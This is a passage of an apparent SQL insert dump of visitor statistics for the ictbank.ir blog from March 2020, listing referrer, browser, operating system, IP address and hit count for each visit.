(1037,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','17.58.62.21','000',0,2,0),
(1038,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','54.245.156.140','000',0,1,0),
(1039,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.79.235','000',0,2,0),
(1040,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.90.133','000',0,1,0),
(1041,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.190.217.123','000',0,3,0),
(1042,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.240.72.151','000',0,4,0),
(1043,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','18.188.67.248','000',0,2,0),
(1044,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.233.101.61','000',0,1,0),
(1045,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.241.249.8','000',0,4,0),
(1046,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.195.148.9','000',0,4,0),
(1047,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','17.58.57.105','000',0,2,0),
(1048,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.249.204','000',0,2,0),
(1049,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','3.219.254.95','000',0,12,0),
(1050,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.72.29','000',0,9,0),
(1051,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','54.188.177.143','000',0,1,0),
(1052,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.52.204','000',0,2,0),
(1053,'2020-03-21','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','99.232.61.211','000',0,1,0),
(1054,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.50.244','000',0,2,0),
(1055,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.153.71','000',0,1,0),
(1056,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.233.114.126','000',0,3,0),
(1057,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.241.152.224','000',0,3,0),
(1058,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.195.226.136','000',0,2,0),
(1059,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.187.78.220','000',0,1,0),
(1060,'2020-03-21','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(1061,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.224.210','000',0,1,0),
(1062,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.195.77.122','000',0,2,0),
(1063,'2020-03-21','http://ictbank.ir/blog','Android Browser','Android','7.0',NULL,NULL,'','172.27.244.3','000',0,3,0),
(1064,'2020-03-21','http://ictbank.ir/blog','Android Browser','Android','10',NULL,NULL,'','172.27.248.3','000',0,3,0),
(1065,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','17.58.57.100','000',0,6,0),
(1066,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','52.39.32.136','000',0,1,0),
(1067,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.240.2.169','000',0,2,0),
(1068,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.102.0','000',0,5,0),
(1069,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.95.43','000',0,4,0),
(1070,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.187.175.53','000',0,1,0),
(1071,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.1.178','000',0,1,0),
(1072,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.219.138.69','000',0,1,0),
(1073,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.239.17','000',0,4,0),
(1074,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','17.58.62.20','000',0,4,0),
(1075,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.189.80','000',0,4,0),
(1076,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.94.123','000',0,2,0),
(1077,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.182.75','000',0,4,0),
(1078,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','104.199.39.182','000',0,2,0),
(1079,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.240.52.7','000',0,2,0),
(1080,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.240.2.170','000',0,1,0),
(1081,'2020-03-21','http://ictbank.ir/blog','Chrome','OS X','10.14.5',NULL,NULL,'','35.162.232.176','000',0,1,0),
(1082,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.90.1','000',0,2,0),
(1083,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','54.244.165.247','000',0,1,0),
(1084,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.233.25.145','000',0,2,0),
(1085,'2020-03-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.157.7.36','000',0,1,0),
(1086,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.195.12.95','000',0,3,0),
(1087,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.191.199','000',0,1,0),
(1088,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','159.69.13.232','000',0,2,0),
(1089,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','45.55.39.61','000',0,1,0),
(1090,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','17.58.57.5','000',0,6,0),
(1091,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','104.237.141.147','000',0,1,0),
(1092,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.240.117.84','000',0,3,0),
(1093,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','52.24.80.3','000',0,1,0),
(1094,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.241.150.101','000',0,3,0),
(1095,'2020-03-21','http://ictbank.ir/blog','Unknown','iOS','Unknown',NULL,NULL,'','85.203.44.56','000',0,1,0),
(1096,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.136.90','000',0,1,0),
(1097,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','17.58.62.4','000',0,2,0),
(1098,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.168.128','000',0,4,0),
(1099,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.83.44','000',0,4,0),
(1100,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.116.111','000',0,2,0),
(1101,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.192.244','000',0,3,0),
(1102,'2020-03-21','http://www.bing.com/search?q=amazon','Internet Explorer','Windows','6.1',NULL,NULL,'','65.155.30.101','000',0,1,0),
(1103,'2020-03-21','http://ictbank.ir/blog','Chrome','OS X','10.13.4',NULL,NULL,'','54.163.148.163','000',0,1,0),
(1104,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','17.58.57.20','000',0,2,0),
(1105,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','54.190.69.230','000',0,1,0),
(1106,'2020-03-21','http://mail.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.6.183.226','000',0,1,0),
(1107,'2020-03-21','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','169.197.108.38','000',0,1,0),
(1108,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','17.58.57.21','000',0,10,0),
(1109,'2020-03-21','http://ictbank.ir/dashtpodcast/','Safari','iOS','13.3',NULL,NULL,'','185.209.161.165','000',0,7,0),
(1110,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.221.96.174','000',0,1,0),
(1111,'2020-03-21','http://ictbank.ir/dashtpodcast/','Chrome','Windows','10.0',NULL,NULL,'','79.127.96.129','000',0,21,0),
(1112,'2020-03-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.219.219.59','000',0,1,0),
(1113,'2020-03-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','207.172.159.132','000',0,1,0),
(1114,'2020-03-21','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','92.51.99.164','000',0,1,0),
(1115,'2020-03-21','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','103.21.25.68','000',0,1,0),
(1116,'2020-03-21','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','66.102.6.47','000',0,1,0),
(1117,'2020-03-21','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','136.22.131.14','000',0,1,0),
(1118,'2020-03-21','https://www.google.com/','Chrome','Windows','6.1',NULL,NULL,'','211.49.146.74','000',0,1,0),
(1119,'2020-03-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.216.8.194','000',0,1,0),
(1120,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','104.199.11.31','000',0,4,0),
(1121,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','17.58.57.7','000',0,2,0),
(1122,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.226.146','000',0,4,0),
(1123,'2020-03-21','http://ictbank.ir/blog','Unknown','iOS','Unknown',NULL,NULL,'','89.199.254.208','000',0,2,0),
(1124,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.94.91','000',0,1,0),
(1125,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.241.181.112','000',0,3,0),
(1126,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.47.67','000',0,4,0),
(1127,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.187.3.106','000',0,1,0),
(1128,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.233.123.147','000',0,2,0),
(1129,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.188.39','000',0,2,0),
(1130,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','17.58.62.5','000',0,6,0),
(1131,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.123.3','000',0,1,0),
(1132,'2020-03-21','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','104.222.43.187','000',0,2,0),
(1133,'2020-03-21','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','104.222.33.102','000',0,1,0),
(1134,'2020-03-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.122.237.63','000',0,1,0),
(1135,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','50.116.22.196','000',0,1,0),
(1136,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.240.58.13','000',0,2,0),
(1137,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.240.115.246','000',0,2,0),
(1138,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.240.84.77','000',0,2,0),
(1139,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','17.58.57.103','000',0,2,0),
(1140,'2020-03-21','http://ictbank.ir/blog','Unknown','Windows','Unknown',NULL,NULL,'','40.112.139.230','000',0,6,0),
(1141,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','157.230.180.149','000',0,1,0),
(1142,'2020-03-21','http://www.bing.com','Internet Explorer','Windows','6.1',NULL,NULL,'','204.13.201.137','000',0,1,0),
(1143,'2020-03-21','http://www.bing.com','Internet Explorer','Windows','6.1',NULL,NULL,'','204.13.201.139','000',0,1,0),
(1144,'2020-03-21','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','208.87.233.140','000',0,5,0),
(1145,'2020-03-21','http://ictbank.ir/blog','Chrome','OS X','10.13.2',NULL,NULL,'','52.59.102.42','000',0,1,0),
(1146,'2020-03-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','115.89.74.126','000',0,3,0),
(1147,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.240.22.99','000',0,1,0),
(1148,'2020-03-21','http://ictbank.ir/blog','Opera','Windows','10.0',NULL,NULL,'','83.31.39.7','000',0,3,0),
(1149,'2020-03-21','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','83.31.39.10','000',0,3,0),
(1150,'2020-03-21','http://ictbank.ir/blog','Internet Explorer','Windows','6.3',NULL,NULL,'','161.69.99.11','000',0,5,0),
(1151,'2020-03-21','http://ictbank.ir/blog','Internet Explorer','Windows','6.3',NULL,NULL,'','69.164.111.198','000',0,4,0),
(1152,'2020-03-21','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','154.127.58.148','000',0,2,0),
(1153,'2020-03-21','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','206.223.230.246','000',0,2,0),
(1154,'2020-03-21','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','45.34.170.158','000',0,2,0),
(1155,'2020-03-21','http://ictbank.ir/blog','Internet Explorer','Windows','10.0',NULL,NULL,'','192.230.42.116','000',0,2,0),
(1156,'2020-03-21','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','50.58.192.2','000',0,2,0),
(1157,'2020-03-21','http://ictbank.ir/blog','Internet Explorer','Windows','10.0',NULL,NULL,'','45.34.170.153','000',0,2,0),
(1158,'2020-03-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','188.116.15.74','000',0,2,0),
(1159,'2020-03-21','http://ictbank.ir/blog','Edge','Windows','10.0',NULL,NULL,'','192.230.43.56','000',0,2,0),
(1160,'2020-03-21','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','161.202.40.88','000',0,1,0),
(1161,'2020-03-21','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','169.55.41.120','000',0,1,0),
(1162,'2020-03-21','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','159.8.237.43','000',0,1,0),
(1163,'2020-03-21','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','85.203.44.3','000',0,1,0),
(1164,'2020-03-21','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','194.186.142.82','000',0,3,0),
(1165,'2020-03-21','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','185.220.100.255','000',0,1,0),
(1166,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','103.107.196.156','000',0,10,0),
(1167,'2020-03-21','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','64.120.28.198','000',0,1,0),
(1168,'2020-03-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','89.238.132.72','000',0,1,0),
(1169,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.245.87.44','000',0,112,0),
(1170,'2020-03-21','http://ictbank.ir/blog','Unknown','iOS','Unknown',NULL,NULL,'','8.20.126.200','000',0,2,0),
(1171,'2020-03-21','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','54.184.197.192','000',0,2,0),
(1172,'2020-03-21','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','54.185.20.21','000',0,1,0),
(1173,'2020-03-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','38.108.182.2','000',0,6,0),
(1174,'2020-03-21','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','216.163.188.191','000',0,5,0),
(1175,'2020-03-21','http://ictbank.ir/blog','Safari','OS X','10.10.5',NULL,NULL,'','185.242.217.49','000',0,1,0),
(1176,'2020-03-21','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','165.231.105.196','000',0,1,0),
(1177,'2020-03-21','http://ictbank.ir/blog','Safari','OS X','10.11.5',NULL,NULL,'','91.108.176.33','000',0,1,0),
(1178,'2020-03-21','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','157.55.169.185','000',0,2,0),
(1179,'2020-03-21','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','65.154.226.220','000',0,2,0),
(1180,'2020-03-21','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','65.154.226.100','000',0,3,0),
(1181,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.192.142','000',0,1,0),
(1182,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','188.143.169.29','000',0,2,0),
(1183,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.132.21','000',0,2,0),
(1184,'2020-03-21','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','185.166.253.23','000',0,3,0),
(1185,'2020-03-21','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','85.206.175.219','000',0,1,0),
(1186,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','104.199.74.218','000',0,1,0),
(1187,'2020-03-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.195.146.140','000',0,1,0),
(1188,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.226.147','000',0,2,0),
(1189,'2020-03-21','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','23.129.64.203','000',0,1,0),
(1190,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','104.155.91.212','000',0,1,0),
(1191,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.166.12','000',0,1,0),
(1192,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.240.25.41','000',0,1,0),
(1193,'2020-03-21','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','23.129.64.212','000',0,1,0),
(1194,'2020-03-21','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','209.141.58.114','000',0,1,0),
(1195,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.195.225.135','000',0,1,0),
(1196,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.187.44.33','000',0,1,0),
(1197,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.187.44.33','000',0,8,0),
(1198,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.195.12.95','000',0,4,0),
(1199,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.192.244','000',0,2,0),
(1200,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.168.128','000',0,1,0),
(1201,'2020-03-22','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','162.247.74.202','000',0,1,0),
(1202,'2020-03-22','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','46.165.245.154','000',0,1,0),
(1203,'2020-03-22','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','73.253.254.129','000',0,1,0),
(1204,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.95.43','000',0,7,0),
(1205,'2020-03-22','http://ictbank.ir/blog','iTunes','Unknown','Unknown',NULL,NULL,'','64.137.146.48','000',0,3,0),
(1206,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.195.220.90','000',0,2,0),
(1207,'2020-03-22','http://ictbank.ir/blog','Unknown','iOS','Unknown',NULL,NULL,'','89.199.254.208','000',0,9,0),
(1208,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','17.58.62.20','000',0,16,0),
(1209,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.241.249.8','000',0,2,0),
(1210,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.187.28.150','000',0,5,0),
(1211,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','104.199.39.182','000',0,3,0),
(1212,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.240.52.7','000',0,2,0),
(1213,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.195.226.136','000',0,2,0),
(1214,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.175.77','000',0,4,0),
(1215,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.132.21','000',0,5,0),
(1216,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','3.219.254.95','000',0,10,0),
(1217,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','17.58.62.4','000',0,8,0),
(1218,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.241.150.101','000',0,4,0),
(1219,'2020-03-22','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','185.183.107.227','000',0,1,0),
(1220,'2020-03-22','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','198.98.53.61','000',0,1,0),
(1221,'2020-03-22','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','23.129.64.181','000',0,1,0),
(1222,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.116.111','000',0,6,0),
(1223,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.240.72.151','000',0,1,0),
(1224,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.240.58.13','000',0,5,0),
(1225,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','104.155.91.212','000',0,4,0),
(1226,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.249.204','000',0,2,0),
(1227,'2020-03-22','http://ictbank.ir/blog','Chrome','OS X','10.14.5',NULL,NULL,'','35.162.232.176','000',0,2,0),
(1228,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.187.78.220','000',0,1,0),
(1229,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.248.96','000',0,6,0),
(1230,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.241.254.56','000',0,2,0),
(1231,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.3.235','000',0,3,0),
(1232,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','104.237.136.79','000',0,6,0),
(1233,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.195.148.9','000',0,2,0),
(1234,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.90.1','000',0,6,0),
(1235,'2020-03-22','http://ictbank.ir/blog','Android Browser','Android','7.0',NULL,NULL,'','79.127.96.129','000',0,51,0),
(1236,'2020-03-22','http://ictbank.ir/blog','Android Browser','Android','10',NULL,NULL,'','172.27.248.151','000',0,3,0),
(1237,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.53.249','000',0,3,0),
(1238,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.99.252','000',0,1,0),
(1239,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.241.152.224','000',0,4,0),
(1240,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','17.58.57.20','000',0,2,0),
(1241,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.72.29','000',0,6,0),
(1242,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.191.199','000',0,1,0),
(1243,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.224.210','000',0,1,0),
(1244,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.195.239.198','000',0,1,0),
(1245,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.144.0','000',0,3,0),
(1246,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.187.189.212','000',0,5,0),
(1247,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.242.234','000',0,4,0),
(1248,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.215.47','000',0,4,0),
(1249,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.47.67','000',0,7,0),
(1250,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.226.146','000',0,7,0),
(1251,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.162.119','000',0,3,0),
(1252,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','17.58.57.21','000',0,6,0),
(1253,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.195.225.135','000',0,5,0),
(1254,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.99.33','000',0,4,0),
(1255,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.234.116','000',0,5,0),
(1256,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.195.77.122','000',0,4,0),
(1257,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.240.22.99','000',0,2,0),
(1258,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.240.86.101','000',0,3,0),
(1259,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','159.89.90.89','000',0,1,0),
(1260,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','104.199.93.8','000',0,3,0),
(1261,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.96.80','000',0,4,0),
